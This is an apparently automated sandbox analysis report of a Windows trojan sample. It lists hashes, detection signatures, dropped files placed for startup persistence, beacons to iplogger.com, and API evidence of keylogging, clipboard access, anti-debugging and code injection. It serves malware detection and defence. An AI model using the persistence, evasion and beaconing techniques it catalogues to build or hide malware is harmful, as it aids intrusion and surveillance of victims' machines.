Windows Analysis Report
cW5i0RdQ4L.exe

Overview

General Information

Sample name:	cW5i0RdQ4L.exe renamed because original name is a hash value
Original sample name:	c065ba22909fc8dbded4ea0eebb24ad5.exe
Analysis ID:	1532361
MD5:	c065ba22909fc8dbded4ea0eebb24ad5
SHA1:	b3d61dd7519be3d2909be9ce2d28f65ec7f9965d
SHA256:	9817f4d8bc1374f102196cfcb8a351abdc0563dea60f6084a7525e5ee5409b6d
Tags:	32exetrojan
Infos:

Detection

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: Search for Antivirus process

AI detected suspicious sample

Drops PE files with a suspicious file extension

Sigma detected: HackTool - CACTUSTORCH Remote Thread Creation

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Sigma detected: WScript or CScript Dropper

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

OS version to string mapping found (often used in BOTs)

PE / OLE file has an invalid certificate

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: SCR File Write Event

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Virustotal: Detection: 9%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Virustotal: Detection: 9%			Perma Link

Multi AV Scanner detection for submitted file

Source: cW5i0RdQ4L.exe

Virustotal: Detection: 13%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.8% probability

Uses 32bit PE files

Source: cW5i0RdQ4L.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.4:49737 version: TLS 1.2

Source: cW5i0RdQ4L.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E64005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_00E64005
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6494A GetFileAttributesW,FindFirstFileW,FindClose,	10_2_00E6494A
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E63CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_00E63CE2
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	10_2_00E6C2FF
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	10_2_00E6CD9F
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6CD14 FindFirstFileW,FindClose,	10_2_00E6CD14
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_00E6F5D8
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_00E6F735
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	10_2_00E6FA36
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00944005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	16_2_00944005
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094494A GetFileAttributesW,FindFirstFileW,FindClose,	16_2_0094494A
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	16_2_0094C2FF
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	16_2_0094CD9F
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094CD14 FindFirstFileW,FindClose,	16_2_0094CD14
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	16_2_0094F5D8
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	16_2_0094F735
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	16_2_0094FA36
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00943CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	16_2_00943CE2

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\103495\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\103495	Jump to behavior

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 104.21.76.57 104.21.76.57

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown

DNS query: name: iplogger.com

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 104.21.76.57:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 104.21.76.57:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E729BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

10_2_00E729BA

Source: global traffic	HTTP traffic detected: GET /15RZZ4 HTTP/1.1User-Agent: CuttingHost: iplogger.com
Source: global traffic	HTTP traffic detected: GET /15RZZ4 HTTP/1.1User-Agent: CuttingHost: iplogger.com

Source: global traffic	DNS traffic detected: DNS query: iplogger.com
Source: global traffic	DNS traffic detected: DNS query: SfqIcJOQLLJLIQzEeYKSUBXfTZxPy.SfqIcJOQLLJLIQzEeYKSUBXfTZxPy

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 13 Oct 2024 00:07:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Sun, 13 Oct 2024 00:07:45 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBJvXw6fUbGRbS6RhK%2BGglPGzigQ8JyjV5ntZrCNYPilv4t%2Bg9XoXSqGoRUPjt%2FvFa12kdE6KCZ2qc23Cv6fj1N6EHxcxAdUxPNTrxcgctB2VZpV9yNWlFJp8g7wo2s%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8d1b16fe1a345e6e-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 13 Oct 2024 00:07:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Sun, 13 Oct 2024 00:08:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKUrKGuZsfbYGpfMv7w87P%2FU%2FWzTCe9VK5vZUxav4Fq8km2kSEIxcqEg6xpwukUByhH2upXUjS3mSd6vZP%2F3TdcVGBnYw0NEY9Hv2CUhgQDSfhXPCwQ39bhwGAJEb5I%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8d1b176299e4c323-EWR

Source: cW5i0RdQ4L.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: cW5i0RdQ4L.exe, 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmp, cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: cW5i0RdQ4L.exe, 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmp, cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoElite.scr, 00000010.00000002.3570670968.00000000009A9000.00000002.00000001.01000000.0000000A.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: Powder.pif, 0000000A.00000002.3571443767.00000000019C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.com/
Source: Powder.pif, 0000000A.00000002.3571321856.0000000001959000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3572166645.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoElite.scr, 00000010.00000002.3572129134.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoElite.scr, 00000010.00000002.3571781276.000000000171A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.com/15RZZ4
Source: Powder.pif, 0000000A.00000002.3571443767.0000000001B30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.com/15RZZ40
Source: Powder.pif, 0000000A.00000002.3572166645.00000000043D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.com/15RZZ4O
Source: GuardianCryptoElite.scr, 00000010.00000002.3571413798.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.com/15RZZ4eListcessId;
Source: GuardianCryptoElite.scr, 00000010.00000002.3572129134.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.com/R
Source: GuardianCryptoElite.scr, 00000010.00000002.3572129134.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.com/m
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Serious.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.4:49737 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050CD

Contains functionality to modify clipboard data

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E74830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		10_2_00E74830
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00954830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		16_2_00954830

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E74632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

10_2_00E74632

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044A5

Potential key logger detected (key state polling based)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E8D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		10_2_00E8D164
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0096D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		16_2_0096D164

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E642D5: CreateFileW,DeviceIoControl,CloseHandle,

10_2_00E642D5

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E58F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

10_2_00E58F2E

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,	0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E65778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	10_2_00E65778
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00945778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	16_2_00945778

Detected potential crypto function

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Code function: 0_2_0040497C	0_2_0040497C
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Code function: 0_2_00406ED2	0_2_00406ED2
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Code function: 0_2_004074BB	0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E0B020	10_2_00E0B020
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E094E0	10_2_00E094E0
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E09C80	10_2_00E09C80
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E223F5	10_2_00E223F5
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E88400	10_2_00E88400
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E36502	10_2_00E36502
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E0E6F0	10_2_00E0E6F0
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E3265E	10_2_00E3265E
